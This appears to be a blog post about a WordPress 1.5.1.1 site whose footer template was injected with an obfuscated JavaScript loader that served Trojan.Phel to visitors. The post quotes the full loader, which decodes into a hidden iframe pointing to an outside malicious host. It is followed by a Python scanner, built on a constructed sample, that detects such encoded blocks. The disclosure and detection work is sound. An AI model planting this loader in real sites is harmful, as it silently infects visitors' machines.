Trojan.Phel.A and WordPress 1.5.1.1
This is just an FYI in case others experience a similar problem. The below is quoted from an email I sent to my webhost to let them know that the problem (which I had reported earlier in the day) was on my end and not theirs.
When Windows SP2 IE users were accessing my WordPress 1.5.1.1 blog ( https://quasistoic.org/ts/ ), some rogue javascript was trying to infect their machine with what appears to be Trojan.Phel.
Related documents (based on VirusScan and NortonAV alerts):
https://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
https://vil.nai.com/vil/content/v_130604.htm
https://vil.mcafeesecurity.com/vil/content/v_130610.htm
https://vil.nai.com/vil/content/v_130609.htm
https://vil.nai.com/vil/content/v_100749.htm
https://vil.nai.com/vil/content/v_101033.htm
https://www.securiteam.com/windowsntfocus/6B00O2KC0C.html
I found the offending javascript in my /ts/wp-content/themes/default/footer.php file. I’m guessing it got there thanks to a security hole in WP 1.5.1.1. Here it is in all its glory:
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
Actions taken: Upgraded to WordPress 1.5.1.3, which addresses a number of security concerns in 1.5.1.1 (and hopefully the one which allowed the script to be inserted into my footer template). I also removed the nasty javascript from my footer template. These actions seem to have fixed the problem.
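An added example, not part of the original post and not WordPress code: a Python check that scans a theme template for the pattern shown above (a script block that shifts the characters of a long string literal with `charCodeAt`/`fromCharCode` and passes the result to `document.write`) and reports the decoded markup when it contains an embedding tag. The sample footer, the `example.invalid` URL and all function names are constructed for illustration.

```python
import re

SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# charCodeAt(...) - N or + N: the per-character shift used by the decoder loop.
SHIFT = re.compile(r"charCodeAt\([^)]*\)\s*([+-])\s*(\d+)")
# A quoted string literal of 40+ characters: candidate encoded payload.
STRING_LIT = re.compile(r"""(['"])((?:(?!\1).){40,})\1""", re.S)
MARKUP = re.compile(r"<\s*(iframe|script|object|embed)\b", re.I)

def shift_decode(text, delta):
    """Apply the same per-character shift the injected loader applies."""
    return "".join(chr(ord(c) + delta) for c in text if ord(c) + delta >= 0)

def scan_template(source):
    """Return one finding per script block that decodes a string into markup."""
    findings = []
    for m in SCRIPT.finditer(source):
        body = m.group(1)
        if "fromCharCode" not in body or "document.write" not in body:
            continue
        sm = SHIFT.search(body)
        if not sm:
            continue
        delta = int(sm.group(2)) * (1 if sm.group(1) == "+" else -1)
        for lit in STRING_LIT.finditer(body):
            decoded = shift_decode(lit.group(2), delta)
            if MARKUP.search(decoded):
                line = source.count("\n", 0, m.start()) + 1
                findings.append({"line": line, "shift": delta, "decoded": decoded})
    return findings

# Constructed sample: a footer template with a shift-3 encoded hidden iframe.
def _encode(plain, n=3):
    return "".join(chr(ord(c) + n) for c in plain)

HIDDEN = ('<div style="visibility: hidden"><iframe src="http://example.invalid/"'
          ' width=1 height=1></iframe></div>')
SAMPLE_FOOTER = (
    "<?php wp_footer(); ?>\n"
    "<p>Powered by WordPress</p>\n"
    "<script type=\"text/javascript\">var k='" + _encode(HIDDEN) + "',t=0,h='';"
    "while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}"
    "document.write(h);</script>\n"
    "</body></html>\n"
)
CLEAN_FOOTER = "<script>document.write(new Date().getFullYear());</script>\n"

if __name__ == "__main__":
    print(scan_template(SAMPLE_FOOTER))
```

Running `scan_template` over the contents of each file under `wp-content/themes/` gives the line number of any matching block, so the template can be compared against a clean copy from the release archive.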